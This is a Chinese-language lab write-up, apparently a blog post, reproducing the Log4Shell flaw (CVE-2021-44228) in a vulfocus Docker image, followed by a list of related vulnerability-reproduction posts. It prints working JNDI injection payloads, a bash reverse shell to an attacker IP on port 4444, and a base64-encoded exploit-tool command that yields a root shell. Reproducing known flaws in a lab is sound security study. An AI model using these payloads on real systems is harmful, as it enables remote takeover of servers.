2. 程式人生 > 其它 >2021-log4j2漏洞復現CVE-2021-44228-反彈shell

2021-log4j2漏洞復現CVE-2021-44228-反彈shell

阿新 發佈:2021-12-15

2021-log4j2漏洞復現CVE-2021-44228

20211215

12:03

該漏洞是最近新爆出的漏洞能夠遠端執行 命令:

該映象本地可以搭建環境:

1、拉取一個docker映象 docker pull vulfocus/log4j2-rce-2021-12-09

2、跑起來docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09

使用vulfocus可以搭建好環境:

訪問該連結:

http://vulfocus.fofa.so:42044/hello

之後POST傳入以下payload:

payload=${jndi:ldap://wdhcrj.dnslog.cn/exp}

回顯回來了內容dnslog:

本地搭建環境,將映象拉下來搭建好環境:

之後準備payload:

bash -i >& /dev/tcp/192.168.19.128/4444 0>&1

在kali/2021資料夾種有這個工具生成payload:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE5LjEyOC80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" -A "192.168.19.128"

嘗試使用第一個payload:

payload=${jndi:rmi://192.168.19.128:1099/uctfqw}

再開一個終端可以回彈shell,有root許可權:

相關推薦

2021-log4j2漏洞復現CVE-2021-44228-反彈shell

2021-log4j2漏洞復現CVE-2021-44228 2021年12月15日 12:03 該漏洞是最近新爆出的漏洞能夠遠端執行 命令:

漏洞復現 CVE-2021-23132】Joomla遠端程式碼執行漏洞

0x01 描述 Joomla是一套知名的內容管理系統,其使用PHP語言和 MySQL資料庫開發,可以在Linux、 Windows、MacOSX等各種不同的平臺上執行

Linux sudo許可權提升漏洞CVE-2021-3156)復現

技術標籤:安全安全 漏洞概述 1月26日,Sudo釋出安全通告,修復了一個類Unix作業系統在命令引數中轉義反斜槓時存在基於堆的緩衝區溢位漏洞。當sudo通過-s或-i命令列選項在shell模式下執行命令時,它將在命令引數

ForgeRock AM遠端程式碼執行漏洞 CVE-2021-35464 漏洞復現

參考連結:https://nosec.org/home/detail/4783.html、https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464

CVE-2021-1675漏洞復現

這幾天出現了這個漏洞,關注了一下,發現影響還是蠻大的,所以這裡學習記錄一下.

Kylin 復現 CVE-2021-3560

CVE-2021-3560 CVE-2021-3560 通過利用 polkit 中存在的漏洞可以達到使得非特權本地使用者獲得系統root許可權的目的。

Grafana 任意檔案讀取漏洞CVE-2021-43798)學習

漏洞概述 Grafana是一個跨平臺、開源的資料視覺化網路應用程式平臺。使用者配置連線的資料來源之後,Grafana可以在網路瀏覽器裡顯示資料圖表和警告。

Linux polkit本地許可權提升漏洞CVE-2021-4034)

漏洞詳情 漏洞名稱:Linux polkit本地許可權提升漏洞CVE-2021-4034) 漏洞標籤:存在EXP

CVE-2021-41773 && CVE-2021-42013拆解復現

CVE-2021-41773 && CVE-2021-42013 參考了這個師傅的WP https://www.jianshu.com/p/3076d9ec68cf

Grafana 任意檔案讀取漏洞CVE-2021-43798)

Preface   Grafana是一個跨平臺、開源的資料視覺化網路應用程式平臺。使用者配置連線的資料來源之後,Grafana可以在網路瀏覽器裡顯示資料圖表和警告。Grafana 存在未授權任意檔案讀取漏洞,攻擊者在未經身份驗證的

漏洞通告】Apache Struts2遠端程式碼執行漏洞CVE-2021-31805)

轉至:https://www.venustech.com.cn/new_type/aqtg/20220413/23713.html 0x00 漏洞概述 CVE   ID CVE-2021-31805

polkit pkexec 本地提權漏洞CVE-2021-4034)

漏洞描述 2022年1月25日 qualys安全研究人員披露 CVE-2021-4034 polkit pkexec 本地提權漏洞 漏洞細節,

Apache HTTP Server 2.4.49 中的路徑遍歷和檔案洩露漏洞CVE-2021-41773)

0x01漏洞概述 Apache HTTP Server專案是為包括UNIX和Windows在內的現代作業系統開發和維護開源HTTP伺服器的努力。

Apache HTTP Server 2.4.50 中的路徑遍歷和檔案洩露漏洞CVE-2021-42013)

0x01漏洞概述         Apache HTTP Server專案是為包括UNIX和Windows在內的現代作業系統開發和維護開源HTTP伺服器的努力。

GitLab 遠端命令執行漏洞CVE-2021-22205)

GitLab是一款Ruby開發的Git專案管理平臺。在11.9以後的GitLab中,因為使用了圖片處理工具ExifTool而受到漏洞CVE-2021-22204的影響,攻擊者可以通過一個未授權的介面上傳一張惡意構造的圖片,進而在GitLab伺服器上執行

Apache HTTP Server 2.4.48 mod_proxy SSRF漏洞CVE-2021-40438)

Apache HTTP Server專案是為包括UNIX和Windows在內的現代作業系統開發和維護開源HTTP伺服器的努力,是Apache基金會開源的一款流行的HTTP伺服器。在其2.4.48及以前的版本中,mod_proxy模組存在一處邏輯錯誤導致攻擊者

漏洞復現-CVE-2017-12629-RCE-solr:XXE

0x00 實驗環境 攻擊機:Win 10、Win Server 2012 R2 靶機:Ubuntu18 (docker搭建的vulhub靶場)

jboss反序列化漏洞復現(CVE-2017-7504)

0x01 環境 使用vulhub搭建:/vulhub-master/jboss/CVE-2017-7504 漏洞點:http://192.168.255.130:8080/jbossmq-httpil/HTTPServerILServlet

Tomcat AJP 檔案包含漏洞復現(CVE-2020-1938)

漏洞原理 Tomcat 伺服器是一個免費的開放原始碼的Web 應用伺服器,其安裝後會預設開啟ajp聯結器,方便與其他web伺服器通過ajp協議進行互動。

漏洞復現-CVE-2016-4437-Shiro反序列化

0x00 實驗環境 攻擊機:Win 10 靶機也可作為攻擊機:Ubuntu18 (docker搭建的vulhub靶場)(兼顧反彈shell的攻擊機)